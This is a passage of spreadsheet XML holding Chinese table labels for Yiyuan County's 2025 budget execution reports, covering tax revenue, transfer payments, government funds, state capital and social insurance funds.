    <t xml:space="preserve"> 增值税税收返还收入</t>
  </si>
  <si>
    <t xml:space="preserve"> 消费税税收返还收入</t>
  </si>
  <si>
    <t xml:space="preserve"> 增值税“五五分享”税收返还收入</t>
  </si>
  <si>
    <t xml:space="preserve"> 其他税收返还收入</t>
  </si>
  <si>
    <t>合   计</t>
  </si>
  <si>
    <t>表4</t>
  </si>
  <si>
    <t>2025年山东省对沂源县专项转移支付情况表</t>
  </si>
  <si>
    <t>一般公共服务</t>
  </si>
  <si>
    <t>国防</t>
  </si>
  <si>
    <t>公共安全</t>
  </si>
  <si>
    <t>教育</t>
  </si>
  <si>
    <t>科学技术</t>
  </si>
  <si>
    <t>文化旅游体育与传媒</t>
  </si>
  <si>
    <t>社会保障和就业</t>
  </si>
  <si>
    <t>卫生健康</t>
  </si>
  <si>
    <t>节能环保</t>
  </si>
  <si>
    <t>城乡社区</t>
  </si>
  <si>
    <t>农林水</t>
  </si>
  <si>
    <t>资源勘探信息等</t>
  </si>
  <si>
    <t>商业服务业等</t>
  </si>
  <si>
    <t>交通运输</t>
  </si>
  <si>
    <t>金融</t>
  </si>
  <si>
    <t>自然资源海洋气象等</t>
  </si>
  <si>
    <t>其他收入</t>
  </si>
  <si>
    <t>表5</t>
  </si>
  <si>
    <t>2025年淄博市对沂源县一般性转移支付情况表</t>
  </si>
  <si>
    <t>一般性转移支付</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="黑体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>6</t>
    </r>
  </si>
  <si>
    <t>2025年淄博市对沂源县专项转移支付情况表</t>
  </si>
  <si>
    <t>灾害防治及应急管理</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="14"/>
        <color rgb="FF000000"/>
        <rFont val="黑体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="14"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>7</t>
    </r>
  </si>
  <si>
    <t>2025年沂源县政府性基金预算收入执行情况表</t>
  </si>
  <si>
    <t>2024年
决算数</t>
  </si>
  <si>
    <t>2025年预算
调整数</t>
  </si>
  <si>
    <t>2025年执行数</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>一、农网还贷资金收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>二、海南省高等级公路车辆通行附加费收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>三、港口建设费收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>四、国家电影事业发展专项资金收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>五、国有土地收益基金收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>六、农业土地开发资金收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>七、国有土地使用权出让收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>八、大中型水库库区基金收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>九、彩票公益金收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>十、城市基础设施配套费收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>十一、小型水库移民扶助基金收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>十二、国家重大水利工程建设基金收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>十三、车辆通行费</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>十四、污水处理费收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>十五、彩票发行机构和彩票销售机构的业务费用</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>十六、其他政府性基金收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>十七、专项债券对应项目专项收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>本年基金收入合计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地方政府专项债务转贷收入</t>
    </r>
  </si>
  <si>
    <t>地方政府新增专项债券转贷收入</t>
  </si>
  <si>
    <t>地方政府再融资专项债券转贷收入</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>转移性收入</t>
    </r>
  </si>
  <si>
    <t>上级补助收入</t>
  </si>
  <si>
    <t>调入资金</t>
  </si>
  <si>
    <t>上年结转及结余收入</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="14"/>
        <color rgb="FF000000"/>
        <rFont val="黑体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="14"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>8</t>
    </r>
  </si>
  <si>
    <t>2025年沂源县政府性基金预算支出执行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color rgb="FF000000"/>
        <rFont val="仿宋_GB2312"/>
        <charset val="134"/>
      </rPr>
      <t>单位：万元</t>
    </r>
  </si>
  <si>
    <t>一、科学技术支出</t>
  </si>
  <si>
    <t>二、文化旅游体育与传媒支出</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国家电影事业发展专项资金安排的支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>旅游发展基金支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国家电影事业发展专项资金对应专项债务收入安排的支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>三、节能环保支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>可再生能源电价附加收入安排的支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>废弃电器电子产品处理基金支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>四、城乡社区支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国有土地使用权出让收入安排的支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国有土地收益基金安排的支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农业土地开发资金安排的支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>城市基础设施配套费安排的支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>污水处理费安排的支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>土地储备专项债券收入安排的支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>棚户区改造专项债券收入安排的支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>城市基础设施配套费对应专项债务收入安排的支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>污水处理费对应专项债务收入安排的支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国有土地使用权出让收入对应专项债务收入安排的支出</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">  超长期特别国债安排的支出</t>
  </si>
  <si>
    <t>五、农林水支出</t>
  </si>
  <si>
    <t xml:space="preserve">  大中型水库移民后期扶持基金支出</t>
  </si>
  <si>
    <t>六、交通运输支出</t>
  </si>
  <si>
    <t xml:space="preserve">    海南省高等级公路车辆通行附加费安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    车辆通行费安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    港口建设费安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    铁路建设基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">    船舶油污损害赔偿基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">    民航发展基金支出</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>海南省高等级公路车辆通行附加费对应专项债务收入安排的支出</t>
    </r>
  </si>
  <si>
    <t>七、资源勘探信息等支出</t>
  </si>
  <si>
    <t>八、其他支出</t>
  </si>
  <si>
    <t xml:space="preserve">    其他政府性基金及对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    彩票发行销售机构业务费安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    彩票公益金安排的支出</t>
  </si>
  <si>
    <t>九、债务付息支出</t>
  </si>
  <si>
    <t>十、债务发行费用支出</t>
  </si>
  <si>
    <t>十一、抗疫特别国债安排的支出</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>本年基金支出合计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地方政府专项债务还本支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地方政府新增专项债券还本支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地方政府再融资专项债券还本支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>上解上级支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>调出资金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>年终累计结余</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="14"/>
        <color rgb="FF000000"/>
        <rFont val="黑体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="14"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>9</t>
    </r>
  </si>
  <si>
    <t>2025年沂源县国有资本经营预算收入执行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>一、利润收入</t>
    </r>
  </si>
  <si>
    <t>二、股息红利收入</t>
  </si>
  <si>
    <t xml:space="preserve">  国有参股公司股息红利收入</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他国有资本经营预算企业股息红利收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>三、产权转让收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国有股权、股份转让收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他国有资本经营预算企业产权转让收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>四、清算收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>五、其他国有资本经营预算收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国有资本经营预算转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>上年结余</t>
    </r>
  </si>
  <si>
    <t>表10</t>
  </si>
  <si>
    <t>2025年沂源县国有资本经营预算支出执行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>一、社会保障和就业支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>二、国有资本经营预算支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>解决历史遗留问题及改革成本支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他国有资本经营预算支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>结转下年</t>
    </r>
  </si>
  <si>
    <t>表11</t>
  </si>
  <si>
    <t>2025年沂源县社会保险基金预算收入执行情况表</t>
  </si>
  <si>
    <t>2024年决算数</t>
  </si>
  <si>
    <t>2025年调整预算数</t>
  </si>
  <si>
    <t>2025年预算执行数</t>
  </si>
  <si>
    <t>占预算的%</t>
  </si>
  <si>
    <t>比上年增长%</t>
  </si>
  <si>
    <t>社会保险基金收入合计</t>
  </si>
  <si>
    <t xml:space="preserve">    其中：保险费收入</t>
  </si>
  <si>
    <t xml:space="preserve">          财政补贴收入</t>
  </si>
  <si>
    <t>一、机关事业单位基本养老保险基金收入</t>
  </si>
  <si>
    <t>二、城乡居民基本养老保险基金收入</t>
  </si>
  <si>
    <t>表12</t>
  </si>
  <si>
    <t>2025年沂源县社会保险基金预算支出执行情况表</t>
  </si>
  <si>
    <t>一、机关事业单位基本养老保险基金支出</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其中：基本养老金支出</t>
    </r>
  </si>
  <si>
    <t>二、城乡居民基本养老保险基金支出</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其中：基础养老金支出</t>
    </r>
  </si>
  <si>
    <t>社会保险基金支出合计</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其中：社会保险待遇支出</t>
    </r>
  </si>
  <si>
    <t>表13</t>
  </si>
  <si>
    <t>2025年沂源县社会保险基金预算结余执行情况表</t>
  </si>
  <si>
    <t>年末滚存结余合计</t>
  </si>
  <si>
    <t>一、机关事业单位基本养老保险基金</t>
  </si>
  <si>
    <t>二、城乡居民基本养老保险基金</t>
  </si>
  <si>
    <t>第二部分 
2025年县级预算执行情况</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="14"/>
        <color rgb="FF000000"/>
        <rFont val="黑体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="14"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>14</t>
    </r>
  </si>
  <si>
    <t>2025年沂源县县级一般公共预算收入执行情况表</t>
  </si>
  <si>
    <t xml:space="preserve">                                </t>
  </si>
  <si>
    <t xml:space="preserve">    增值税</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">         </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>企业所得税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">         </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>个人所得税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">         </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>资源税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">         </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>城市维护建设税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">         </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>房产税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">         </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>印花税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">         </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>城镇土地使用税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">         </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>土地增值税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">         </t>
    </r>
    <r>
      <rPr>
